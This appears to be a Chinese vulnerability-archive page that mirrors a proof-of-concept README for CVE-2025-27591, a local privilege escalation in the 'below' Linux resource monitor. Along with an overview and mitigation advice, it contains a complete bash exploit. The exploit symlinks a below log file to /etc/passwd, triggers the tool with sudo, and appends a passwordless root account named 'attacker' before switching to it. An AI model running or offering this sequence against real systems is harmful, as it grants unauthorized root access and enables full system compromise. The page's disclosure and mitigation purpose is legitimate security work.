关联漏洞
标题:
below 安全漏洞
(CVE-2025-27591)
描述:below是Meta Incubator开源的一个现代 Linux 系统的资源监视器。 below v0.9.0之前版本存在安全漏洞,该漏洞源于创建了全局可写目录,可能导致通过符号链接攻击提升到root权限。
描述
CVE-2025-27591
介绍
### CVE-2025-27591 - Privilege Escalation via Insecure Log Handling
#### Overview
CVE-2025-27591 is a **local privilege escalation vulnerability** in the `below` utility (versions prior to the patched release) caused by **insecure symbolic link handling** within its logging mechanism. Attackers with local access can exploit this flaw to overwrite arbitrary files as the root user, leading to full privilege escalation.
#### Vulnerability Details
The `below` tool writes logs to `/var/log/below/` without properly validating symbolic links. By pre-creating a symlink pointing to a sensitive file (e.g., `/etc/passwd`), an attacker can inject arbitrary content with elevated privileges when the vulnerable process runs under `sudo`.
#### Exploit Demonstration
```bash
# Check if log directory exists
test -d /var/log/below && ls -ld /var/log/below
# Remove existing log file and create a malicious symlink
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Prepare malicious passwd entry
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Trigger vulnerable behavior using sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Switch to the newly created root-privileged user
su attacker
```
#### Impact
Successful exploitation grants **root privileges** to a local, unprivileged attacker, enabling full system compromise.
#### Mitigation
- Apply the vendor patch immediately once available.
- Restrict access to `/var/log/below/` directory.
- Validate log file paths before writing to avoid following symbolic links.
文件快照
[4.0K] /data/pocs/07a7f0dbd454caf184ef8767438619e151ecd063
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。